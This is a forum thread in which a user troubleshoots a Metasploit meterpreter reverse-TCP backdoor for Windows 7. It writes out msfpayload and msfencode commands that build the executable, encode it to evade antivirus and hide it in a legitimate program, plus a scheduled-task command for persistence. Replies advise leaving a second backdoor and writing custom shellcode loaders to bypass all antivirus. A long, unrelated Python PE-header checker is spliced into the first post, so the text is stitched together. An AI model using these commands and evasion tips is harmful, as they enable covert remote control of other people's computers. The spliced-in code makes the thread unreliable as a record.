Windows not opening backdoor exe


JohnUofU

Newbie

Posts: 6

Joined: Sat Jan 28, 2012 1:45 am

Post Sat Jan 28, 2012 1:49 am

Windows not opening backdoor exe

Problem: 
I'm creating a payload, encoding it, moving to a Windows 7 machine, and Windows will not open the exe I've created.

Process:
I started with a simple payload; here is what I used...
  Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 x > /root/backdoor.exe

It works.  It gets made, sent, and I get a meterpreter connection.  My problem with it, however, is that it lights up pretty much every AV it could run into.  So I decided to try encoding it to see what happens...
  Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=4444 R| msfencode -c 5 -e x86/shikata_ga_nai -x > /root/EncodedBackdoor.exe

This works fine up to the point where Windows tries to open it.  It says that the file isn't compatible with Windows and it refuses to run it.  I've also tried hiding it in a legit Windows exe, but that hasn't worked either.  And if I'm doing this part wrong, please point that out too...
  Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=4444 R| msfencode -c 5 -e x86/shikata_ga_nai -x > /root/windows-software.exe -t exe > /root/HiddenBackdoor.exe

The "windows-software.exe" is the legit windows exe.  And hiding it within that file did not work either.  Same problem with it not opening.

I'm fairly confused about it.  I've spent a LOT of time checking out tutorials, reading forums, and watching videos, and everyone seems to follow the same steps, except NONE of them had this problem.

What I'm working with:
  My Machine:  HP Pavilion DM3Z with BackTrack 5R1
  Target:  HP Laptop... but it's running Windows 7

PS:  Both machines are mine on my network.
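One diagnostic a practitioner runs on a file that Windows rejects as "not compatible" is a header sanity check, because the loader gives that kind of error when the file is not a PE image at all. The script below is an added example, not code from this thread: it parses the DOS header, the PE signature, the COFF file header and the optional-header magic using only the standard library, and both sample inputs (a constructed stub header chain and a constructed blob of non-PE bytes standing in for raw encoder output saved under a .exe name) are made up for the demonstration.

```python
import struct

MZ_SIGNATURE = b"MZ"
PE_SIGNATURE = b"PE\0\0"
MACHINES = {0x14C: "x86", 0x8664: "x64", 0x1C0: "ARM", 0xAA64: "ARM64"}
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002  # Characteristics bit: image is an exe/dll, not an object

def check_pe(data: bytes) -> dict:
    """Header-only triage: report whether `data` even looks like a loadable PE image."""
    result = {"valid": False, "reason": None, "machine": None, "pe32plus": None}
    if len(data) < 0x40 or data[:2] != MZ_SIGNATURE:
        result["reason"] = "no MZ (DOS) header: not a PE image at all"
        return result
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]  # file offset of the PE signature
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        result["reason"] = "e_lfanew does not point at a PE signature"
        return result
    # COFF file header (20 bytes, little-endian): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    result["machine"] = MACHINES.get(machine, f"unknown(0x{machine:x})")
    if not chars & IMAGE_FILE_EXECUTABLE_IMAGE:
        result["reason"] = "IMAGE_FILE_EXECUTABLE_IMAGE not set (object file, not an exe/dll)"
        return result
    opt_off = e_lfanew + 24
    if opt_size < 2 or opt_off + 2 > len(data):
        result["reason"] = "optional header missing"
        return result
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        result["reason"] = f"bad optional header magic 0x{magic:x}"
        return result
    result["pe32plus"] = magic == 0x20B
    result["valid"] = True
    result["reason"] = "headers look like a loadable PE image"
    return result

def build_stub_pe(machine: int = 0x14C, magic: int = 0x10B) -> bytes:
    """Constructed minimal header chain (MZ -> PE -> COFF -> optional magic); not a runnable program."""
    dos = bytearray(0x40)
    dos[:2] = MZ_SIGNATURE
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header directly after the DOS stub
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 2, IMAGE_FILE_EXECUTABLE_IMAGE)
    return bytes(dos) + PE_SIGNATURE + coff + struct.pack("<H", magic)

# Constructed stand-in for raw encoder output written straight to a .exe name: no headers at all.
RAW_BLOB = b"\xcc" * 72
```

To triage a real file, call `check_pe(open(path, "rb").read())`; a file that fails the first check is what Windows refuses as an invalid or incompatible program, independent of any AV verdict.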

millwalll

Post Sat Jan 28, 2012 8:11 am

Re: Windows not opening backdoor exe

Hmm, I would try playing around with the encoding a bit more to see if changing it makes any difference. It also could be the AV; maybe the encoding has not changed the signature enough and the AV has it marked as bad, so it won't let you run it at all.


I am not an expert, but those are the only things I can think of :P

JohnUofU

Newbie

Posts: 6

Joined: Sat Jan 28, 2012 1:45 am

Post Sat Jan 28, 2012 4:43 pm

Re: Windows not opening backdoor exe

I could play around with encoding more, I suppose.  But I don't think it's the AV stopping it.  Normally an AV will notify or at least have a record of what's been flagged, but it doesn't with these files.  Thanks for the reply; hopefully someone can offer some more help.

hayabusa

Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Sat Jan 28, 2012 7:20 pm

Re: Windows not opening backdoor exe

If I were to guess, the encoder likely used bad characters. You have to know (and exclude from use) bad characters, so the encoder won't use them.

Bad chars can cause all sorts of issues, like not running at all, or being detected as a non-Windows program, as you're running into.

So I'd agree on trying different / other encoding and / or looking at the characters to see if it used bad ones.
Last edited by hayabusa on Sat Jan 28, 2012 7:23 pm, edited 1 time in total.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP, GPEN, C|EH

JohnUofU

Newbie

Posts: 6

Joined: Sat Jan 28, 2012 1:45 am

Post Sat Jan 28, 2012 7:22 pm

Re: Windows not opening backdoor exe

Got the file to open on the target PC with encoding.  It doesn't avoid the AV I want it to, but that isn't a big deal right now.  The major problem I have now is reestablishing a connection after I close a session.  I added a schedule for it to run every minute via "scheduleme", but that doesn't work, and I even tried manually running the .exe on the target PC, but that doesn't work either.  Here is my schedule code:

  Code:
run scheduleme -m 1 -u -e /root/hacker.exe


Any thoughts?

PS:  hayabusa, you posted while I was typing this, but you're correct, bad characters were most likely the problem and that issue was solved.

EDIT:  OK, apparently now it will start a new session when I manually execute the file on the target (it wasn't doing that before), but I'd still like it to automatically make a new connection; the code I tried to do that with is above...
Last edited by JohnUofU on Sat Jan 28, 2012 7:26 pm, edited 1 time in total.

hayabusa

Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Sat Jan 28, 2012 7:26 pm

Re: Windows not opening backdoor exe

Sorry...  Would've replied earlier (and saved you some time), but it's been a hectic day here.

With regards to the schedule, you might need to toy with that more (or give us more detail.)  Most often, after exploit, services crash, or hang in a funky state.  Thus, I (and others) typically leave another backdoor, for future access, after exiting the initial session.

(Edit: that's obviously your intent, but I / we may need more info to determine why your scheduleme isn't working.  Could be a lot of issues - rights of the user running it vs. the scheduler, etc.  Hard telling, solely from the info given, at this point.)
Last edited by hayabusa on Sat Jan 28, 2012 7:36 pm, edited 1 time in total.

JohnUofU

Newbie

Posts: 6

Joined: Sat Jan 28, 2012 1:45 am

Post Sat Jan 28, 2012 7:39 pm

Re: Windows not opening backdoor exe

No worries.  That makes sense that it would be left in a "funky state" haha.  It feels like that's what has been happening.  And leaving another backdoor is smart and definitely something I'll keep in mind on more serious tasks.

So the restarting sessions problem arose as I was on the forums, so I posted it immediately, but it turns out it was an easy fix.  The task was scheduled to only run when the computer was plugged in (and it wasn't).  It's working kind of hit and miss now.  Looks like it will just be an issue in the task properties that I will play around with.

Thanks for the quick reply.

hayabusa

Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Sat Jan 28, 2012 7:46 pm

Re: Windows not opening backdoor exe

You're welcome!  Good luck, and keep pressing forward.  Always the most fun, for me, when I hit issues like yours, in testing.  I love challenges, and learn best that way, myself, most times.

cd1zz

Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Sat Jan 28, 2012 10:32 pm

Re: Windows not opening backdoor exe

A great writeup from Scriptjunkie a while back that speaks to AV evasion and Metasploit payloads: http://www.scriptjunkie.us/2011/04/why- ... ates-exes/

Basically, if you want to get around all AV, don't use Metasploit; write your own, or just write code that can VirtualAlloc and execute shellcode :)

Last edited by cd1zz on Sat Jan 28, 2012 11:10 pm, edited 1 time in total.

JohnUofU

Newbie

Posts: 6

Joined: Sat Jan 28, 2012 1:45 am

Post Sat Jan 28, 2012 11:02 pm

Re: Windows not opening backdoor exe

I appreciate the links.  Very useful reading.  And I agree about making it yourself.  It's always the best way to do anything.  :)  I'm just working on basics until summer.  Then I'm gonna hit this stuff hard before I start my network security classes next fall.  I'm also trying to work through my transition from Windows to Linux.

Triban

Hero Member

Posts: 620

Joined: Fri Feb 19, 2010 4:17 pm

Post Mon Jan 30, 2012 3:20 pm

Re: Windows not opening backdoor exe

not to hijack the thread...

Did you try buying it dinner first?  Maybe cuddle? :D
Certs: GCWN
(@)Dewser
